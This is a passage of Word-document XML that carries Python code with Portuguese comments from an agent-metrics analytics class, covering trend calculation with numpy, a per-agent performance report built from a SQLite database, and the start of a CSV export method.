    <w:p w14:paraId="5AEB8047" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            if time.time() - timestamp &lt; self.cache_ttl:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A51011" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                return cached_data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326621B6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13280C2D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        metrics = self.db.get_agent_metrics(agent_id, hours)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0267D1A6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E282BA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        if len(metrics) &lt; 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BE06F9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            return {"trend": "insufficient_data", "confidence": 0.0}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1E2A11" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C409D14" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Agrupar métricas por tipo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D6C601" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        performance_metrics = [m for m in metrics if m['metric_name'] == 'performance_score']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7707FA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        response_time_metrics = [m for m in metrics if m['metric_name'] == 'response_time_ms']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3079E627" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7F21F6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        trends = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B46B242" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42316A4A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Analisar tendência de performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC76A54" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        if len(performance_metrics) &gt;= 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0947035E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            values = [m['value'] for m in performance_metrics[-10:]]  # Últimos 10 pontos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0458E187" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D0AA3E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            # Calcular tendência linear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40200130" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            x = np.arange(len(values))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DA6129" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            slope, intercept = np.polyfit(x, values, 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CE29C1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A248C01" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            # Calcular correlação</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471BF9B9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            correlation = np.corrcoef(x, values)[0, 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1748159C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4371CEA0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            trends['performance'] = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00109883" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "slope": slope,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B7788A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "correlation": correlation,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7497FA48" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "trend": "improving" if slope &gt; 0.1 else "declining" if slope &lt; -0.1 else "stable",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056993D7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "confidence": abs(correlation),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E594DF0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "current_value": values[-1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030FB7D3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "change_rate": slope * len(values)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0BBFA5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C3D3F2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A69B75" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Analisar tendência de tempo de resposta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA6BD12" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        if len(response_time_metrics) &gt;= 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB02A70" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            values = [m['value'] for m in response_time_metrics[-10:]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3358EECB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CDAEFF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            x = np.arange(len(values))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBF50E3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            slope, intercept = np.polyfit(x, values, 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8F162B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            correlation = np.corrcoef(x, values)[0, 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58523348" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64862BD1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            trends['response_time'] = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4BE8E4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "slope": slope,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D321EE3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "correlation": correlation,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D7BCD0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "trend": "improving" if slope &lt; -5 else "declining" if slope &gt; 5 else "stable",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7342F1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "confidence": abs(correlation),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DBE70E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "current_value": values[-1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543BACD9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "change_rate": slope * len(values)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1062D37B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A57D692" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CF846A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Cache do resultado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7217CD7E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.cache[cache_key] = (trends, time.time())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163345B3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48059F4C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        return trends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABCF416" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DECC2C9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def generate_performance_report(self, agent_id: str = None) -&gt; Dict[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF98E35" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Gera relatório completo de performance"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D16464" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        report = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0521B3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "generated_at": datetime.now().isoformat(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EAB3E8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "report_type": "performance_analysis",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6404A9FD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "time_range": "24h",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FA3F88" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "agents": {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1863F81C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E320A63" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C544FD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        if agent_id:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF4939F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            agents_to_analyze = [agent_id]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D02262" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C411D3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            # Analisar todos os agentes com dados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EC87D3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            conn = sqlite3.connect(self.db.db_path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2357A9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            cursor = conn.cursor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E6B61A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            cursor.execute("SELECT DISTINCT agent_id FROM metrics")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE4D6C5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            agents_to_analyze = [row[0] for row in cursor.fetchall()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0FF670" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            conn.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6E33B5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC2548A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        for aid in agents_to_analyze:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4331E4EF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            metrics = self.db.get_agent_metrics(aid, 24)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C288481" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            cycles = self.db.get_evolution_cycles(aid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69704757" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136DC5D3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            if not metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754AF4BC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579BBC44" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C92732B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            # Calcular estatísticas básicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6958F2C3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            performance_values = [m['value'] for m in metrics if m['metric_name'] == 'performance_score']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1466213F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            response_times = [m['value'] for m in metrics if m['metric_name'] == 'response_time_ms']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1631C6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47804222" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            agent_report = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E75FDF3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "total_metrics": len(metrics),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9C26D3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "total_cycles": len(cycles),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148A3470" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "performance": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150A609E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "current": performance_values[-1] if performance_values else 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A293C27" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "average": statistics.mean(performance_values) if performance_values else 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF58B32" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "std_dev": statistics.stdev(performance_values) if len(performance_values) &gt; 1 else 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E9CDA4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "min": min(performance_values) if performance_values else 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C82C334" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "max": max(performance_values) if performance_values else 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F876554" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78470D45" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "response_time": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D51463" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "current": response_times[-1] if response_times else 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017C11C8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "average": statistics.mean(response_times) if response_times else 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC2C3C8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "std_dev": statistics.stdev(response_times) if len(response_times) &gt; 1 else 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDD83E2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "min": min(response_times) if response_times else 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76194B3B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "max": max(response_times) if response_times else 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4367FB96" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072B8BBA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "trends": self.calculate_performance_trends(aid),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9C1711" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "evolution_summary": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2DBF5D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "total_cycles": len(cycles),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25134AF9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "successful_cycles": len([c for c in cycles if c['success']]),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702FF36B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "avg_cycle_duration": statistics.mean([c['duration_ms'] for c in cycles if c['duration_ms']]) if cycles else 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9A3C37" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "total_improvements": sum([c['improvements_count'] for c in cycles if c['improvements_count']])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A04FD00" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6A9594" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF951E4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC76CDF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            report["agents"][aid] = agent_report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA88713" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F529222" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        return report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBCFEF7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468E10B0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def export_data_csv(self, agent_id: str = None, hours: int = 24) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53230A4D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Exporta dados para CSV"""</w:t>
      </w:r>
    </w:p>
